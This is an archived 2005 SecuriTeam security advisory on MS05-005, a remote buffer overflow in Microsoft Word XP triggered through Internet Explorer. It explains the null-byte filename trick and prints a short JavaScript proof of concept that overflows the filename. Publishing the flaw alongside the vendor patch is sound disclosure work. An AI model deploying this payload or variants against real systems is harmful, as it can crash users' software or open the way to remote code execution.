[NT] Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005)

From: SecuriTeam (support_at_securiteam.com)
Date: 02/13/05

  • Next message: SecuriTeam: "[NT] Windows SMB Client Transaction Response Handling Technical Details (MS05-011)" 
    To: list@securiteam.com
Date: 13 Feb 2005 11:08:27 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005)
    ------------------------------------------------------------------------

    SUMMARY

    A new vulnerability in Microsoft Word XP allows an attacker to launch a
    buffer overflow attack. This attack could occur when a user opened a Word
    document using Internet Explorer.

    DETAILS

    When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP
    "takes over" and opens that doc file. The problem appears when sending a
    doc file request that contains a null byte (parser) at the end of the doc
    filename (the rtf extension is also vulnerable).

    For Example:
    http://example.com/myfile.doc is a valid request.
    However the following:
    http://example.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaa...aa.doc is an
    invalid request. Such a request will be sent to the server hosting the doc
    file.

    Most servers like IIS and Apache will truncate the characters before the
    %00 while sending the filename to Internet Explorer. At this stage,
    Internet Explorer will hand over the string to Microsoft Word XP, which
    will now receive a long string. This string causes an exploitable buffer
    overflow, allowing remote code execution.

    Proof of Concept Code:
    <Script>
    var mylongstring,myjunk;
    mylongstring ="";
    myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
    bbbbbbbbbbbbbbbbbbbbbb";
    for(c=1;c<5000;c++)
    {
      mylongstring = mylongstring + myjunk;
    }
    window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
    </script>

    Vendor Status:
    Microsoft was notified on July 13, 2004.
    Microsoft released an advisory and patches to this vulnerability. For
    further details please refer to:
    <http://www.microsoft.com/technet/security/bulletin/ms05-005.mspx>
    Vulnerability in Microsoft Office XP could allow Remote Code Execution
    (MS05-005)

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:rivgi@finjan.com> Rafel
    Ivgi.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Windows SMB Client Transaction Response Handling Technical Details (MS05-011)"

    Relevant Pages